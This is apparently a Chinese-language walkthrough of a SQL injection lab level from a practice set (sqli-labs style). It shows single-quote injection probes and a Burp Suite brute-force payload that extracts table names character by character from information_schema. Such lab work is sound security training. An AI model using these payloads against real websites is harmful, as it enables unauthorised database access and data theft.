知识点:
- 这里感觉是一个单纯的单引号绕过
- bp爆破配置的条件和第七关一样
首先判断注入类型
构造id=1/0
回显成功

构造id=1'
错误回显,感觉又是一个单引号绕过

构造id=1''
正常回显了,说明不错,就是一个单引号绕过

构造payload:id=1' and 1=1 --+
正常回显,绝杀了

利用数据库名再试一下
构造id=1' and database()='security' --+
成功回显

接下来就是利用bp进行爆破了;设置和上一关一样
构造的payload:id=1%27+and+mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),§1§,1)=%27§e§%27--+
对相关设置进行配置;和第七关一样的爆破配置;最后也是需要进行过滤的;虽然这里的长度是不一样的,但是直接利用过滤和排序获取的信息更加的规整好看




10